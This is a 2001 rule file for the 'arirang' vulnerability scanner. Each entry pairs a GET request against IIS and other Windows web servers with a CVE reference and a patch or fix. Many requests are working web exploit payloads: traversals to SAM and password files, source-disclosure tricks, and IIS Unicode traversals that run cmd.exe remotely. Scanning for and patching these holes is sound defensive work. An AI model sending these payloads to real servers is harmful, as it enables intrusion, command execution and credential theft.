#######################################################################################################################
# nt.uxe  (~2001/08/10) WWW NT related WWW Vulnerabilities scan rule for arirang.
# (this scan rule use a GET method.)
#
# (c) 2000-2001 by pilot
# http://www.monkey.org/~pilot  
# pilot@monkey.org
# 
# supported complete patch information.
#
#
# NOTICE : nt.uxe check only IIS5 .printer check test (english,korean windows 2000 version)
#          so.. nt.uxe cannot other language windows 2000 version. 
#
# solution for other language windows 2000 version :
# .printer ISAPI have a buffer overflow-high lisk
# Disabling web based printing results in a registry entry.
# HKLM\Software\Policies\Microsoft\windows NT\printers\DisableWebPrinting\n\tREG_DWORD 0x1
# This entry must be set to 1 for the .printer mapping to reliably be disabled.
# or 
# if you didn't patch,you must to patch your server
# http://www.microsoft.com/Downloads/Release.asp?ReleaseID=29321
#
# Security Information. 
# Microsoft TechNet Security(Windows NT/2000 Patch MainSite)
# http://www.microsoft.com/technet/security/ 
#
# Microsoft Security Tools and IIS 4/5 Security CheckList 
# http://www.microsoft.com/technet/security/tools.asp
# 
# Secure Internet Information Services 5 Checklist ( but old.. not so good) 
# http://www.microsoft.com/technet/security/iis5chk.asp 
#
######################################################################################################################

200 OK-> GET :/iissamples/exair/search/advsearch.asp^ExAir Sample DoS;http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0449\n\tsolution:Delete all files and directories that contain sample site pages;
200 OK-> GET :/carbo.dll^iCat Carbo Server(carbo.dll);delete thisfile;
200 OK-> GET :/cgi-win/uploader.exe^Websites pro(uploader.exe);http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0177CVE-1999-0177\n\tsolution:http://website.oreilly.com;
200 OK-> GET :/search97.vts^search97.vts;http://www.verity.comverity website;
200 OK-> GET :/scripts/tools/newdsn.exe^Remote File create,IIS DoS(newdsn.exe);http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0191CVE-1999-0191\n\tsolution:delete this file ;
200 OK-> GET :/scripts/tools/getdrvs.exe^IIS 3.0 Remote File create(getdrvs.exe);solution:Delete all files and directories that contain sample site pages.\n\thttp://www.microsoft.com/technet/security/iischk.asp;
200 OK-> GET :/_vti_inf.html^Frontpage98  Hole(_vti_inf.html);FP extensions and the path on the server where the extensions are located.\n\tsolution:delete this file;
200 OK-> GET :/_vti_pvt/service.pwd^Frontpage98  Hole(service.pwd);http://www.securityfocus.com/vdb/bottom.html?vid=1205;
200 OK-> GET :/_vti_pvt/users.pwd^Frontpage98  Hole(users.pwd);http://www.securityfocus.com/vdb/bottom.html?vid=1205;
200 OK-> GET :/_vti_pvt/authors.pwd^Frontpage98  Hole(authors.pwd);http://www.securityfocus.com/vdb/bottom.html?vid=1205;
200 OK-> GET :/_vti_pvt/administrators.pwd^Frontpage98 Hole(administrators.pwd);http://www.securityfocus.com/vdb/bottom.html?vid=1205;
200 OK-> GET :/_vti_pvt/shtml.dll^Frontpage98 Hole(shtml.dll);http://www.securityfocus.com/vdb/bottom.html?vid=1205;
200 OK-> GET :/_vti_pvt/shtml.exe^Frontpage98 Hole(shtml.exe);http://www.securityfocus.com/vdb/bottom.html?vid=1205;
200 OK-> GET :/samples/search/queryhit.htm^Frontpage98 Helo(queryhit.htm);Rhino9 security advisory\n\tsolution:Delete all files and directories that contain sample site pages;
#pws
200 OK-> GET :/....../autoexec.bat^Pws,Jana WebServer(dotdotdot);http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0386CVE-1999-0386\n\tsolution:http://www.microsoft.com/technet/security/current.asp Microsoft Technet Security(ms99-010);
200 OK-> GET :/..../config.sys^Personal WebServer Hole B;http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0386CVE-1999-0386\n\tsolution:http://www.microsoft.com/technet/security/current.aspMicrosoft Technet Security(ms99-010);
#end pws
200 OK-> GET :/iisadmpwd/achg.htr^IIS Web Password Hole(achg.htr);http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0407\n\tsolution:Delete all files and directories that contain sample site pages;
200 OK-> GET :/iisadmpwd/aexp.htr^IIS Web Password Hole(aexp.htr);http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0407\n\tsolution:Delete all files and directories that contain sample site pages;
200 OK-> GET :/iisadmpwd/aexp2.htr^IIS Web Password Hole(aexp2.htr);http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-040\n\tsolution:Delete all files and directories that contain sample site pages; 
200 OK-> GET :/."./."./winnt/win.ini%20.php3^IIS CGI File parsing bug(win.ini);http://www.microsoft.com/technet/security/bulletin/ms00-086.asp;
200 OK-> GET :/iisadmpwd/aexp3.htr^IIS Web Password Hole(aexp3.htr);http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0407\n\tsolution:Delete all files and directories that contain sample site pages;
200 OK-> GET :/iisadmpwd/aexp4.htr^IIS Web Password Hole(aexp4.htr);http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0407\n\tsolution:Delete all files and directories that contain sample site pages;
200 OK-> GET :/iisadmpwd/aexp4b.htr^IIS Web Password Hole(aexp4b.htr);http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0407\n\tsolution:Delete all files and directories that contain sample site pages;
200 OK-> GET :/iisadmpwd/anot.htr^IIS Web Password Hole(anot.htr);http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0407\n\tsolution:Delete all files and directories that contain sample site pages;
200 OK-> GET :/iisadmpwd/anot3.htr^IIS Web Password Hole(anot3.htr);http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0407\n\tsolution:Delete all files and directories that contain sample site pages;
200 OK-> GET :/cgi-bin/visadmin.exe^Omi HTTPD (visadmin.exe);OmniHTTPD visadmin.exe Denial of Service Vulnerability\n\tsolution:http://www.omnicron.ab.ca;
200 OK-> GET :/scripts/no-such-file.pl^IIS Perl Security Hole;IIS and Perl may be used to reveal true directory location\n\tsolution:delete perl.exe;
200 OK-> GET :/scripts/fpcount.exe^IIS (fpcount.exe) DoS;IIS counter Denial of Service\n\tsolution:delete fpcount.exe;
200 OK-> GET :/cgi-bin/rguest.exe^WebCom Guestbook Hole(rquest.exe);Webcom's CGI Guestbook Security Hole\n\tsolution:http://www.webcom.sewebcom homepage;
200 OK-> GET :/cgi-bin/wguest.exe^WebCom Guestbook Hole(wguest.exe);Webcom's CGI Guestbook Security Hole\n\tsolution:http://www.webcom.sewebcom homepage;
200 OK-> GET :/default.asp::$DATA^IIS Data Stream Hole;http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0278CVE-1999-0278\n\tsolution:http://www.microsoft.com/technet/security/current.asp    (MS98-003);
200 OK-> GET :/iissamples/exair/howitworks/codebrws.asp^IIS (codebrws.asp) Hole A;solution:delete this file or ftp://ftp.microsoft.com/bussys/iis/iis-public/fixes/usa/Viewcode-fix/;
200 OK-> GET :/iissamples/sdk/asp/docs/codebrws.asp^IIS (codebrws.asp) Hole B;solution:delete this file or ftp://ftp.microsoft.com/bussys/iis/iis-public/fixes/usa/Viewcode-fix/;
200 OK-> GET :/msadc/Samples/SELECTOR/showcode.asp^IIS (showcode.asp) Hole;solution:delete this file or ftp://ftp.microsoft.com/bussys/iis/iis-public/fixes/usa/Viewcode-fix/;
200 OK-> GET :/adsamples/config/site.csc^SiteServer AdSamples(site.csc);http://www.securityfocus.com/vdb/bottom.html?vid=256;
200 OK-> GET :/scripts/iisadmin/ism.dll?http/dir^Peer Webservice Hole(ism.dll);solution:delete sample files;
200 OK-> GET :/AdvWorks/equipment/catalog_type.asp^ASP Sample ODBC Hole(catalog_type.asp);ASP sample ODBC Bug\n\tsolution:delete samples;
#ColdFusion
200 OK-> GET :/cfdocs/expeval/openfile.cfm^ColdFusion  Hole(openfile.cfm);http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-1999-0477\n\thttp://www.allaire.com/products/coldfusion/index.cfmvendor homepage;
200 OK-> GET :/cfdocs/expeval/ExprCalc.cfm^ColdFusion  Hole(explcalc.cfm);http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-1999-0477\n\thttp://www.allaire.com/products/coldfusion/index.cfmvendor homepage;   
200 OK-> GET :/cfdocs/expeval/displayopenedfile.cfm^ColdFusion  Hole(displayopenedfile.cfm);http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-1999-0477\n\thttp://www.allaire.com/products/coldfusion/index.cfmvendor homepage;
200 OK-> GET :/cfdocs/expeval/sendmail.cfm^ColdFusion  Hole(sendmail.cfm);http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-1999-0477\n\thttp://www.allaire.com/products/coldfusion/index.cfmvendor homepage;
200 OK-> GET :/getFile.cfm^ColdFusion  Hole(getFile.cfm) ;http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-1999-0477\n\thttp://www.allaire.com/products/coldfusion/index.cfmvendor homepage;
#end ColdFusion
#Alibaba Multiple CGI 
200 OK-> GET :/cgi-bin/get32.exe^Alibaba Multiple CGI(get32.exe);http://www.allaire.com/products/coldfusion/index.cfm;
200 OK-> GET :/cgi-bin/alibaba.pl^Alibaba Multiple CGI(alibaba.pl);http://www.allaire.com/products/coldfusion/index.cfm;
200 OK-> GET :/cgi-bin/tst.bat^Alibaba Multiple CGI(tst.bat);http://www.allaire.com/products/coldfusion/index.cfm;
#end Alibaba
200 OK-> GET :/index.asp%81^IIS Double Byte Hole;IIS double byte ASP source Reveal \n\tEnglish:ftp://ftp.microsoft.com/bussys/iis/iis-public/fixes/usa/security/fesrc-fix\n\tSimplified Chinese: ftp://ftp.microsoft.com/bussys/iis/iis-public/fixes/chs/security/fesrc-fix\n\tTraditional Chinese: ftp://ftp.microsoft.com/bussys/iis/iis-public/fixes/cht/security/fesrc-fix\n\tJapanese:ftp://ftp.microsoft.com/bussys/iis/iis-public/fixes/jpn/security/fesrc-fix\n\tKorean: ftp://ftp.microsoft.com/bussys/iis/iis-public/fixes/kor/security/fesrc-fix;
200 OK-> GET :/../../../../../winnt/repair/sam._^TeamShare TeamTrack V3.0 Hole;http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0933CVE-1999-0933\n\thttp://www.teamtrack.com;
200 OK-> GET :/cgi-bin/imagemap.exe^OmniHTTPd 1.01,Pro2.04 bof(imagemap.exe);http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0951\n\tsolution:delete this file;
200 OK-> GET :/cgi-bin/cgitest.exe^W4-Server2.6a(cgitest.exe);W4 Server Cgitest.exe Buffer Overflow Vulnerability\n\tsolution:delete this file;
200 OK-> GET :/../../../../config.sys^URL Live! 1.0 WebServer Hole;http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0915;
200 OK-> GET :/scripts/webbbs.exe^WebBBS Hole(webbbs.exe);webbbs buffer overflow \n\tsolution:delete file;
200 OK-> GET :/cgi-bin/test.bat^AN-HTTPd 1.20b Hole(test.bat);http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0947;    
200 OK-> GET :/cgi-bin/input.bat^AN-HTTPd 1.20b Hole(input.bat);http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0947; 
200 OK-> GET :/cgi-bin/input2.bat^AN-HTTPd 1.20b Hole(input2.bat);http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0947;  
200 OK-> GET :/ssi/envout.bat^AN-HTTPd 1.20b Hole(envout.bat);http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0947;
200 OK-> GET :/msadc/msadcs.dll^RDS Securty Hole(msadcs.dll);important patch\n\thttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-1011\n\tsolution:http://www.microsoft.com/technet/security/bulletin/ms99-025.asp;
200 OK-> GET :/cgi-bin/htimage.exe^Frontpage path,buffer oveflow(htimage.exe);frontpage buffer overflow,path reveal\n\thttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2000-0122CAN-2000-0122\n\thttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2000-0256\n\tsolution:delete file;
wwwroot-> GET :/test.idc^IIS Path Reveal(anything.idc);IIS Path Reveal;
wwwroot-> GET :/test.idq^IIS Path Reveal(anything.idq);IIS Path Reveal;
wwwroot-> GET :/test.ida^IIS Path Reveal(anything.ida);IIS Path Reveal;
wwwroot-> GET :/test.idw^IIS Path Reveal(anything.idw);IIS Path Reveal;
200 OK-> GET :/scripts/counter.exe^counter.exe DoS;Counter.exe Denial of Service Vulnerabilities\n\tsolution:delete this file;
200 OK-> GET :/common/browser.inc^IIS ASP VBScript Error;bugtraq id 978;
200 OK-> GET :/cgi-bin/echo.bat^Sambar Server Batch CGI(echo.bat);http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2000-0213\n\thttp://www.sambar.com;
200 OK-> GET :/cgi-bin/hello.bat^Sambar Server Batch CGI(hello.bat);http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2000-0213\n\thttp://www.sambar.com;
200 OK-> GET :/rightfax/fuwww.dll^Right Fax Web Client (fuwww.dll);;
200 OK-> GET :/scripts/cgimail.exe^CGI Mailer Hole(cgimail.exe);;
200 OK-> GET :/default.asp\\^IIS UNC Mapping Hole;http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0246\n\t<solution>http://www.microsoft.com/technet/security/bulletin/MS00-019.asp;
200 OK-> GET :/officescan/cgi/jdkRqNotify.exe^Trend OfficeScan Hole(jdkRqNotify.exe);Trend Micro OfficeScan\n\tsolution:http://www.antivirus.com/download/ofce_patch.htm;
200 OK-> GET :/ows-bin/perlidlc.bat?&dir^Oracle Web Listener Batch Hole(*.bat);http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0169;
200 OK-> GET :/cgi-bin/windmail.exe^WinMail Hole (winmail.exe);http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2000-0242\n\thttp://www.geocel.com/windmail/index.htm;
200 OK-> GET :/iissamples/issamples/oop/qfullhit.htw?CiWebHitsFile=/../../winnt/system32/config/system.log&CiRestriction=none&CiHiliteType=Full^Malform Hit-Highlighting(qfullhit.htw)A;http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0097\n\thttp://www.microsoft.com/technet/Security/Bulletin/ms00-006.aspMS00-006.asp;
200 OK-> GET :/iissamples/exair/search/qfullhit.htw?CiWebHitsFile=/../../winnt/system32/config/system.log&CiRestriction=none&CiHiliteType=Full^Malform Hit-Highlighting(qfullhit.htw) B;http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0097\n\thttp://www.microsoft.com/technet/Security/Bulletin/ms00-006.aspMS00-006.asp;
200 OK-> GET :/null.htw?CiWebHitsFile=/index.asp%20&CiRestriction=none&CiHiliteType=Full^Index Server Security Hole(null.htw);http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0097\n\thttp://www.microsoft.com/technet/Security/Bulletin/ms00-006.aspMS00-006.asp;
200 OK-> GET :/_vti_bin/_vti_aut/dvwssr.dll^MS frontpage98 BackDoor,buffer overflow(dvwssr.dll);backdoor and buffer overflow\n\thttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0260\n\tsolution:delete this file;
500-> GET :/_vti_bin/_vti_aut/dvwssr.dll^MS frontpage98 BackDoor,buffer overflow(dvwssr.dll);backdoor and buffer overflow\n\thttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0260\n\tsolution:delete this file;
401-> GET :/_vti_bin/_vti_aut/dvwssr.dll^MS frontpage98 BackDoor,buffer overflow(dvwssr.dll);backdoor and buffer overflow\n\thttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0260\n\tsolution:delete this file;
200 OK-> GET :/scripts/wa.exe^Web Archive version 1.8d bof(wa.exe);http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0425\n\thttp://www.lsoft.com;
200 OK-> GET :/scripts/cart32.exe^Cart32 Backdoor(cart32.exe);bugtraq id 1153\n\thttp://www.lsoft.com;
200 OK-> GET :/scripts/c32web.exe^Cart32 Backdoor(c32web.exe);bugtraq id 1153\n\thttp://www.lsoft.com;
200 OK-> GET :/scripts/gupcgi.exe^DNews News Server bof(gupcgi.exe);http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2000-0423\n\thttp://www.netwinsite.com;
200 OK-> GET :/scripts/dnewsweb.exe^DNews News Server bof(dnewsweb.exe);http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2000-0423\n\thttp://www.netwinsite.com;
200 OK-> GET :/scripts/dmailweb.exe^DMailweb bof(dmailweb.exe);http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2000-0423\n\thttp://www.netwinsite.com;
200 OK-> GET :/process_bug.cgi^Bugzilla 2.8(process_bug.cgi);http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0421;
200 OK-> GET :/enter_bug.cgi^Bugzilla 2.8(enter_bug.cgi);http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0421;
200 OK-> GET :/cgi-bin/wconsole.dll^Rockliffe MailSite bof(wconsole.dll);http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0398\n\tsolution:http://www.rockliffe.com;
200 OK-> GET :/scripts/Carello/add.exe^Pacific Soft Carello(add.exe);http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0396\n\tsolution:http://www.carelloweb.com;
200 OK-> GET :/cgi-bin/redirect.exe^PDGsoft Shopping Cart(redirect.exe);http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2000-0401\n\tsolution:http://www.pdgsoft.com/Security/security2.html;     
200 OK-> GET :/cgi-bin/changepw.exe^PDGsoft Shopping Cart(changepw.exe);http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2000-0401\n\tsolution:http://www.pdgsoft.com/Security/security2.html;
200 OK-> GET :/cgi-bin/ceilidh.exe^Ceilidh 2.60a (ceilidh.exe);http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0555\n\tsolution:delete this file;
200 OK-> GET :/index.JSP^Multi JSP Source (JSP);http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0499;
200 OK-> GET :/file/index.jsp^BEA system WebLogic Server(index.jsp);solution:http://www.weblogic.com;
200 OK-> GET :/servlet/SessionServlet^Allaire JRun 2.3.x (SessionServlet);http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0540\n\tsolution:http://www.allaire.com; 
200 OK-> GET :/_vti_bin/shtml.dll/nosuch.htm^FrontPage 2k <=1.1 Path vul;thttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2000-0413\n\tsolution:http://msdn.microsoft.com/workshop/languages/fp/2000/winfpse.asp;
200 OK-> GET :/_vti_bin/shtml.dll^FrontPage 2k,IIS Multiple  (shtml.dll);http://www.microsoft.com/technet/security/CSOverv.asp\n\tsolution:http://msdn.microsoft.com/workshop/languages/fp/2000/winfpse.asp; 
200 OK-> GET :/cfide/administrator/index.cfm^Cold Fusion 4.5.1 DoS (index.cfm);http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0538\n\tsolution:http://www.allaire.com;
200 OK-> GET :/cgi-bin/bb-hostsvc.sh^BB4 Big Brother (bb-hostsvc.sh);http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0638\n\tsolution:http://bb4.comvendor homepage;
200 OK-> GET :/..\\..\\..\winnt\repair\sam._^Deerfield WorldClient 2.1 Directory vul;http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0660\n\tsolution:http://www.altn.com;
200 OK-> GET :/global.asa+.htr^IIS 4.0/5.0 Source Vul(+.htr);http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0630\n\tsolution:IIS4 http://www.microsoft.com/Downloads/Release.asp?ReleaseID=22709\n\tIIS5 http://www.microsoft.com/Downloads/Release.asp?ReleaseID=22708;
200 OK-> GET :/bin/common/user_update_passwd.pl^Blackboard 4.0 (user_update_passwd.pl);http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0627\n\tsolution:http://download.blackboard.com;
200 OK-> GET :/bin/common/user_update_admin.pl^Blackboard 4.0 (user_update_admin.pl);http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0627\n\tsolution:http://download.blackboard.com;
200 OK-> GET :/cgi-bin/post32.exe^Alibab Web Piped Vul (post32.exe);http:\\csm.alcyonis.frvendor homepage\n\tsolution:delete this file;        
200 OK-> GET :/cgi-bin/lsindex2.bat^Alibab Web Piped Vul (lsindex2.bat);http:\\csm.alcyonis.frvendor homepage\n\tsolution:delete this file;
200 OK-> GET :/_vti_bin/fpcount.exe?Page=default.htm|Image=2|Digits=1 ^Frontpage97 fpcount bof(fpcount.exe);solution:delete fpcount.exe;
200 OK-> GET :/page.cfm^ColdFusion ODBC (page.cfm);http://www.allaire.comvendor homepage\n\tsolution:delete this file;
200 OK-> GET :/scripts/samples/details.idc^NT ODBC (details.idc);solution:Delete all files and directories that contain sample site pages.;
200 OK-> GET :/../../windows/user.dat^SimpleServer 1.06 (dotdot);http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0664\n\tsolution:http://www.analogx.com/contents/download/network/sswww.htm;     
200 OK-> GET :/_vti_bin/shtml.exe^FrontPage MS-DOS Device DoS(shtml.exe);http://msdn.microsoft.com/workshop/languages/fp/2000/sr12.asp\n\tdelete this file;
200 OK-> GET :/search.dll?search?query=%00&logic=AND^Sambar Server Search CGI 1;Disable search capability by removing search.dll;
200 OK-> GET :/search.dll?search?query=/&logic=AND^Sambar Server Search CGI 2;Disable search capability by removing search.dll;
200 OK-> GET :/cgi-bin/webplus.exe^Web+ multiple(webplus.exe);http://www.talentsoft.com;
200 OK-> GET :/_private/shopping_cart.mdb^Shopping Cart 2.0(shopping_cart.mdb);http://www.smartwin.com.au/cybershop.htm;
200 OK-> GET :/Album/?mode=album&album=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc&dispsize=640&start=0^PHPix Directory;http://phpix.org;
200 OK-> GET :/cgi-bin/Web_Store/web_store.cgi^WebStore Directory(web_store.cgi);http://www.extropia.com/download.html;
200 OK-> GET :/cgi-bin/shopper.cgi^Web Shopper Directory(shopper.cgi);http://www.bytesinteractive.com;
200 OK-> GET :/cgi-bin/shop.cgi^Hassan Shopping Cart (shop.cgi);http://www.irata.com/products.html;
# high lisk Microsoft IIS 4.0 / 5.0 UNICODE file read & Remote Execute
200 OK-> GET :/a.asp/..%c1%1c../..%c1%1c../winnt/win.ini^IIS 4/5 UNICODE;important patch\n\tsolution:http://www.microsoft.com/technet/security/bulletin/ms00-057.asp;
200 OK-> GET :/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir^IIS 4/5 UNICODE Remote Execute Check method 1;important patch\n\tsolution:http://www.microsoft.com/technet/security/bulletin/ms00-057.asp;
200 OK-> GET :/msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir^IIS 4/5 UNICODE Remote Execute Check method 2;important patch\n\tsolution:http://www.microsoft.com/technet/security/bulletin/ms00-057.asp;
200 OK-> GET :/_vti_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir^IIS 4/5 UNICODE Remote Execute Check method 3;important patch\n\tsolution:http://www.microsoft.com/technet/security/bulletin/ms00-057.asp;
200 OK-> GET :/cgi-bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir^IIS 4/5 UNICODE Remote Execute Check method 4;important patch\n\tsolution:http://www.microsoft.com/technet/security/bulletin/ms00-057.asp;
200 OK-> GET :/_vti_cnf/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir^IIS 4/5 UNICODE Remote Execute Check method 5;important patch\n\tsolution:http://www.microsoft.com/technet/security/bulletin/ms00-057.asp;
200 OK-> GET :/bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir^IIS 4/5 UNICODE Remote Execute Check method 6;important patch\n\tsolution:http://www.microsoft.com/technet/security/bulletin/ms00-057.asp;
200 OK-> GET :/cgi/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir^IIS 4/5 UNICODE Remote Execute Check method 7;important patch\n\tsolution:http://www.microsoft.com/technet/security/bulletin/ms00-057.asp;
200 OK-> GET :/exchange/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir^IIS 4/5 UNICODE Remote Execute Check method 8;important patch\n\tsolution:http://www.microsoft.com/technet/security/bulletin/ms00-057.asp;
200 OK-> GET :/adsamples/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir^IIS 4/5 UNICODE Remote Execute Check method 9;important patch\n\tsolution:http://www.microsoft.com/technet/security/bulletin/ms00-057.asp;
200 OK-> GET :/PBServer/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir^IIS 4/5 UNICODE Remote Execute Check method 10;important patch\n\tsolution:http://www.microsoft.com/technet/security/bulletin/ms00-057.asp;
200 OK-> GET :/samples/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir^IIS 4/5 UNICODE Remote Execute Check method 11;important patch\n\tsolution:http://www.microsoft.com/technet/security/bulletin/ms00-057.asp;
200 OK-> GET :/Rpc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir^IIS 4/5 UNICODE Remote Execute Check method 12;important patch\n\tsolution:http://www.microsoft.com/technet/security/bulletin/ms00-057.asp;
200 OK-> GET :/_mem_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir^IIS 4/5 UNICODE Remote Execute Check method 13;important patch\n\tsolution:http://www.microsoft.com/technet/security/bulletin/ms00-057.asp;
# end Microsoft IIS 4.0 / 5.0 UNICODE file read & Remote Execute
#high lisk IIS File Parsing Vulnerability  Remote Execute Check
200 OK-> GET :/scripts/check.bat/..%C1%9C..%C1%9C..%C1%9Cwinnt/system32/cmd.exe?/c%20dir%20C:\^IIS File Parsing Vulnerability Check method 1;IIS 5 http://download.microsoft.com/download/win2000platform/Patch/Q277873/NT5/EN-US/Q277873_W2K_SP2_x86_en.EXE\n\tIIS4 http://www.microsoft.com/ntserver/nts/downloads/critical/q277873;
200 OK-> GET :/msadc/check.bat/..%C1%9C..%C1%9C..%C1%9Cwinnt/system32/cmd.exe?/c+dir^IIS File Parsing Vulnerability Check method 2;IIS 5 http://download.microsoft.com/download/win2000platform/Patch/Q277873/NT5/EN-US/Q277873_W2K_SP2_x86_en.EXE\n\tIIS4 http://www.microsoft.com/ntserver/nts/downloads/critical/q277873;
200 OK-> GET :/Rpc/check.bat/..%C1%9C..%C1%9C..%C1%9Cwinnt/system32/cmd.exe?/c+dir^IIS File Parsing Vulnerability Check method 3;IIS 5 http://download.microsoft.com/download/win2000platform/Patch/Q277873/NT5/EN-US/Q277873_W2K_SP2_x86_en.EXE\n\tIIS4 http://www.microsoft.com/ntserver/nts/downloads/critical/q277873;
200 OK-> GET :/samples/check.bat/..%C1%9C..%C1%9C..%C1%9Cwinnt/system32/cmd.exe?/c+dir^IIS File Parsing Vulnerability Check method 4;IIS 5 http://download.microsoft.com/download/win2000platform/Patch/Q277873/NT5/EN-US/Q277873_W2K_SP2_x86_en.EXE\n\tIIS4 http://www.microsoft.com/ntserver/nts/downloads/critical/q277873;
200 OK-> GET :/PBServer/check.bat/..%C1%9C..%C1%9C..%C1%9Cwinnt/system32/cmd.exe?/c+dir^IIS File Parsing Vulnerability Check method 5;IIS 5 http://download.microsoft.com/download/win2000platform/Patch/Q277873/NT5/EN-US/Q277873_W2K_SP2_x86_en.EXE\n\tIIS4 http://www.microsoft.com/ntserver/nts/downloads/critical/q277873;
200 OK-> GET :/_vti_cnf/check.bat/..%C1%9C..%C1%9C..%C1%9Cwinnt/system32/cmd.exe?/c+dir^IIS File Parsing Vulnerability Check method 6;IIS 5 http://download.microsoft.com/download/win2000platform/Patch/Q277873/NT5/EN-US/Q277873_W2K_SP2_x86_en.EXE\n\tIIS4 http://www.microsoft.com/ntserver/nts/downloads/critical/q277873;
200 OK-> GET :/_vti_bin/check.bat/..%C1%9C..%C1%9C..%C1%9Cwinnt/system32/cmd.exe?/c+dir^IIS File Parsing Vulnerability Check method 7;IIS 5 http://download.microsoft.com/download/win2000platform/Patch/Q277873/NT5/EN-US/Q277873_W2K_SP2_x86_en.EXE\n\tIIS4 http://www.microsoft.com/ntserver/nts/downloads/critical/q277873;
200 OK-> GET :/bin/check.bat/..%C1%9C..%C1%9C..%C1%9Cwinnt/system32/cmd.exe?/c+dir^IIS File Parsing Vulnerability Check method 8;IIS 5 http://download.microsoft.com/download/win2000platform/Patch/Q277873/NT5/EN-US/Q277873_W2K_SP2_x86_en.EXE\n\tIIS4 http://www.microsoft.com/ntserver/nts/downloads/critical/q277873;
200 OK-> GET :/cgi-bin/check.bat/..%C1%9C..%C1%9C..%C1%9Cwinnt/system32/cmd.exe?/c+dir^IIS File Parsing Vulnerability Check method 9;IIS 5 http://download.microsoft.com/download/win2000platform/Patch/Q277873/NT5/EN-US/Q277873_W2K_SP2_x86_en.EXE\n\tIIS4 http://www.microsoft.com/ntserver/nts/downloads/critical/q277873;
